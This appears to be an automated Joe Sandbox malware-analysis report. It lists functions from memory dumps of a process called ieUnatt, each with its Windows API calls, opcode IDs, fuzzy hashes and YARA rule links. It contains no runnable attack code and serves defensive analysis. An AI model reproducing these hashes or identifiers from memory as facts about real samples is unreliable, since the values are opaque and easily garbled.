                                                                                  • Instruction ID: 38ff4de9eaf9300fbe56393c9733bb945d1ed4a52f29db2421c14b3af6c685c3
                                                                                  • Opcode Fuzzy Hash: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                                  • Instruction Fuzzy Hash: D231E5B5A00248AFDB14DF98C881EEFB7B9EF98714F108209FD18A7245D770A951CBA1
                                                                                  Function 001C9C50 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(001B240E,?,59BA9130,00000000,00000004,00003000,?,?,?,?,?,001C860F,001B240E,?,?,001CBAEE), ref: 001C9D12
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                                  • Instruction ID: 2d4579824c83cb336602c357caddb05ab0483e9d3e5a702d658e7c6d6c4c2820
                                                                                  • Opcode Fuzzy Hash: 78c3e9e1af6e42e75c04ad679f68a9628a38d05a20cb79896eb21beca53510fe
                                                                                  • Instruction Fuzzy Hash: 8D2117B5A00249ABDB10DF98CC81FAFBBB9EF98704F108109FD08A7245D774A951CBA5
                                                                                  Function 001C9A60 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                                  • Instruction ID: ca74c155cf6aeffdce5543f51c8007222cef3021a138efc3c9ccb4e08a1ff8cd
                                                                                  • Opcode Fuzzy Hash: 40aeafa31968e7346c6f32c97f288871a68a477233a112c1e668a31cc1cc25af
                                                                                  • Instruction Fuzzy Hash: 4E119E315006497BD720EB98CC42FEFB7ACDFA5704F004109FA08A7281EB70A9458BA1
                                                                                  Function 001C9B00 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 001C9B34
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1a0000_ieUnatt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                  • Instruction ID: 0e4bd4dc5b155b1884238d690c960a2b08d85a1144aabb3a8e55004250830bfb
                                                                                  • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                  • Instruction Fuzzy Hash: BCE08C3A2012087BD620FA69CC41FDBBBACDFC6B54F404419FA18A7242C7B0B9418BF5
                                                                                  Function 04314650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: adb1702affeaa1a9a5a15cf7a5a16e40656c0c7948d049d358a68e3d01145253
                                                                                  • Instruction ID: c3f3bdaf17606c6081c48b9d7dd6d6e5db2fb147bd86394e27d7b5e05f432d7c
                                                                                  • Opcode Fuzzy Hash: adb1702affeaa1a9a5a15cf7a5a16e40656c0c7948d049d358a68e3d01145253
                                                                                  • Instruction Fuzzy Hash: 85900275601510526144715C490540670059BE1315395E215A0555560C8A18D9559269
                                                                                  Function 04314340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0798c82cd060883fa6e3c1794396b1ded6a1100f8a37db8e6ed2a319e48ddae1
                                                                                  • Instruction ID: 17bc6605b12b49285838e6e7023f8a066b3db525facf6525ad75d312530e1ed9
                                                                                  • Opcode Fuzzy Hash: 0798c82cd060883fa6e3c1794396b1ded6a1100f8a37db8e6ed2a319e48ddae1
                                                                                  • Instruction Fuzzy Hash: E890023560581022B144715C498554650059BE0315B55E111E0425554C8E14DA565361
                                                                                  Function 04312C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: eaa06cf57971519ec9bfa94c18b3d2048350bca9ca0c65160ab941230da3e341
                                                                                  • Instruction ID: af7080bd969171f54b3ad6902952dc3b28ca5cb105c7f70883267cba0152a32d
                                                                                  • Opcode Fuzzy Hash: eaa06cf57971519ec9bfa94c18b3d2048350bca9ca0c65160ab941230da3e341
                                                                                  • Instruction Fuzzy Hash: 0590023520149812F114715C850574A10058BD0315F59E511A4425658D8A95D9917121
                                                                                  Function 04312C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: dd031dba7c61e8d54fb6ef8b79194f36bf994da989f1bc38d688356ecf00bc58
                                                                                  • Instruction ID: 5db4fabfa0d1a115e6c2c16f364c52bafedfb836b3f9fbf532446cc1f9fd3e18
                                                                                  • Opcode Fuzzy Hash: dd031dba7c61e8d54fb6ef8b79194f36bf994da989f1bc38d688356ecf00bc58
                                                                                  • Instruction Fuzzy Hash: E190023520141852F104715C4505B4610058BE0315F55E116A0125654D8A15D9517521
                                                                                  Function 04312CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9b463eaeb6a8c51dfc5b08e459347fe453b765891ac205c8e1a7ae353e0507c0
                                                                                  • Instruction ID: fff2c346373b659125d840d2437108f6fe8886109c97c4ba5b122a680afebdf7
                                                                                  • Opcode Fuzzy Hash: 9b463eaeb6a8c51dfc5b08e459347fe453b765891ac205c8e1a7ae353e0507c0
                                                                                  • Instruction Fuzzy Hash: 7890023520141412F104759C550964610058BE0315F55F111A5025555ECA65D9916131
                                                                                  Function 04312D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 24121601d5d59a69cc402729d44e8c807d505ae19927a72f7b6b616ec7fc20b4
                                                                                  • Instruction ID: 6fe4496c939a0d98847fbd4d567be9f98dff863861db4d3c5a969be72ade7fdd
                                                                                  • Opcode Fuzzy Hash: 24121601d5d59a69cc402729d44e8c807d505ae19927a72f7b6b616ec7fc20b4
                                                                                  • Instruction Fuzzy Hash: C790043530141013F144715C551D7075005DFF1315F55F111F0415554CDD15DD575333
                                                                                  Function 04312D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e004d00f971409208b656e69aeff578dc398930e66f4a4a48103c944248ff73b
                                                                                  • Instruction ID: 8d1124f4f3bad428160214899a1ca3e0164d45fe579f435ddc161b0b6e8965af
                                                                                  • Opcode Fuzzy Hash: e004d00f971409208b656e69aeff578dc398930e66f4a4a48103c944248ff73b
                                                                                  • Instruction Fuzzy Hash: 5190023D21341012F184715C550960A10058BD1216F95F515A0016558CCD15D9695321
                                                                                  Function 04312DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 1f1d593375db5f01328b09f9659006aaba61ae4b132d7efd788cd27521deecec
                                                                                  • Instruction ID: 723ce51080cea236da32d606052dd511914ae04fcad3d62f995ca278f1898788
                                                                                  • Opcode Fuzzy Hash: 1f1d593375db5f01328b09f9659006aaba61ae4b132d7efd788cd27521deecec
                                                                                  • Instruction Fuzzy Hash: BB90023520141423F115715C460570710098BD0255F95E512A0425558D9A56DA52A121
                                                                                  Function 04312DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 409b190d8559c6d98045da7d7025f0e2bae3442c9f2a3a6da7093d23955e3982
                                                                                  • Instruction ID: 72650922e3d73923a74340875f0747af714d23f8d7d0d1065d4002a229bcb2e8
                                                                                  • Opcode Fuzzy Hash: 409b190d8559c6d98045da7d7025f0e2bae3442c9f2a3a6da7093d23955e3982
                                                                                  • Instruction Fuzzy Hash: 2B900235242451627549B15C450550750069BE0255795E112A1415950C8926E956D621
                                                                                  Function 04312E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: e2ebe01dae0ccb5de7eabf72f515c1792d76f6c47adf2df57de8fd10388981f3
                                                                                  • Instruction ID: 8516281a541c1cd706c27f270e77fcc1acfd520a71e5e54a23471414f6fbf96b
                                                                                  • Opcode Fuzzy Hash: e2ebe01dae0ccb5de7eabf72f515c1792d76f6c47adf2df57de8fd10388981f3
                                                                                  • Instruction Fuzzy Hash: 8390023560141512F105715C4505616100A8BD0255F95E122A1025555ECE25DA92A131
                                                                                  Function 04312EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 9cd4a68f9b4af2f6d797b582bf3d1523a327cb34bee751153d8e3feb6c862fc4
                                                                                  • Instruction ID: 15798f5d5a316df32fc65ea0d3f5c5929d0214626fd65c56972ba590e349ed9e
                                                                                  • Opcode Fuzzy Hash: 9cd4a68f9b4af2f6d797b582bf3d1523a327cb34bee751153d8e3feb6c862fc4
                                                                                  • Instruction Fuzzy Hash: B690027520181413F144755C490560710058BD0316F55E111A2065555E8E29DD516135
                                                                                  Function 04312F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: c7cbfe7f755e7dd6e056389d3ef9bdc366999ca1c92ee26d33913c152c9e6660
                                                                                  • Instruction ID: e0cef66b266c0823a229fc92affe9f4d9cb60959063ea3a47e95f7b81ad0dd58
                                                                                  • Opcode Fuzzy Hash: c7cbfe7f755e7dd6e056389d3ef9bdc366999ca1c92ee26d33913c152c9e6660
                                                                                  • Instruction Fuzzy Hash: 4B90027534141452F104715C4515B061005CBE1315F55E115E1065554D8A19DD526126
                                                                                  Function 04312FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 01c0371f2cc996588bdc419510a6ea1c1a601f2959d3825b9bae23898b86e79c
                                                                                  • Instruction ID: 0616f1a5e8e1562d1c0d8ce01e813b2d3189fb2b73fd1049a1c3c0068db3fdb7
                                                                                  • Opcode Fuzzy Hash: 01c0371f2cc996588bdc419510a6ea1c1a601f2959d3825b9bae23898b86e79c
                                                                                  • Instruction Fuzzy Hash: 41900235601410526144716C89459065005AFE1225755E221A0999550D8959D9655665
                                                                                  Function 04312FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: ef59f1c3432b27c5533924291c4e970d7e0a50e19429644b14a5f2e26c2730c5
                                                                                  • Instruction ID: bce69ee455cc670d2ad90ed4154bf35ce3249f6b039b5c3654a855090a34ac7a
                                                                                  • Opcode Fuzzy Hash: ef59f1c3432b27c5533924291c4e970d7e0a50e19429644b14a5f2e26c2730c5
                                                                                  • Instruction Fuzzy Hash: 16900235211C1052F204756C4D15B0710058BD0317F55E215A0155554CCD15D9615521
                                                                                  Function 04312AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f60f71c4744f3f86c596ad720e47b8c01d334979fa71cc1a7be0205580666e2c
                                                                                  • Instruction ID: b599d2e0f636e59036fec230c46b5556b57fa73cab7ccc57e99f48a16446c44e
                                                                                  • Opcode Fuzzy Hash: f60f71c4744f3f86c596ad720e47b8c01d334979fa71cc1a7be0205580666e2c
                                                                                  • Instruction Fuzzy Hash: C2900239221410122149B55C070550B14459BD6365395E115F1417590CCA21D9655321
                                                                                  Function 04312AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 263984f3dee8247f1c3ce17848bbdc4257d1be5fa19fa31956d7c50a6c552719
                                                                                  • Instruction ID: 978aba51d6392f4d25da52a471fce2a71cafcb7235416ecaa2a8a567986dfd74
                                                                                  • Opcode Fuzzy Hash: 263984f3dee8247f1c3ce17848bbdc4257d1be5fa19fa31956d7c50a6c552719
                                                                                  • Instruction Fuzzy Hash: FF900239211410132109B55C070550710468BD5365355E121F1016550CDA21D9615121
                                                                                  Function 04312B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 6d03956bba87549e86068f93052e7ea6193ddd9b9e82f73d5c72f6a17c90e658
                                                                                  • Instruction ID: 6229e325eede4aefa384406b30b3722f20c195ee40418de609a69f905bfe3954
                                                                                  • Opcode Fuzzy Hash: 6d03956bba87549e86068f93052e7ea6193ddd9b9e82f73d5c72f6a17c90e658
                                                                                  • Instruction Fuzzy Hash: 47900275202410136109715C4515616500A8BE0215B55E121E1015590DC925D9916125
                                                                                  Function 04312BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: a129b01265baf8c339f305201d856a4a64a53c91d1c4293e71ec6d390755257a
                                                                                  • Instruction ID: 91154e0d47a0855b75592ca7a333130bef1656cbfdcef8cd9399db92efa7ee46
                                                                                  • Opcode Fuzzy Hash: a129b01265baf8c339f305201d856a4a64a53c91d1c4293e71ec6d390755257a
                                                                                  • Instruction Fuzzy Hash: 3890023560541812F154715C451574610058BD0315F55E111A0025654D8B55DB5576A1
                                                                                  Function 04312BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.00000000043CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_42a0000_ieUnatt.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
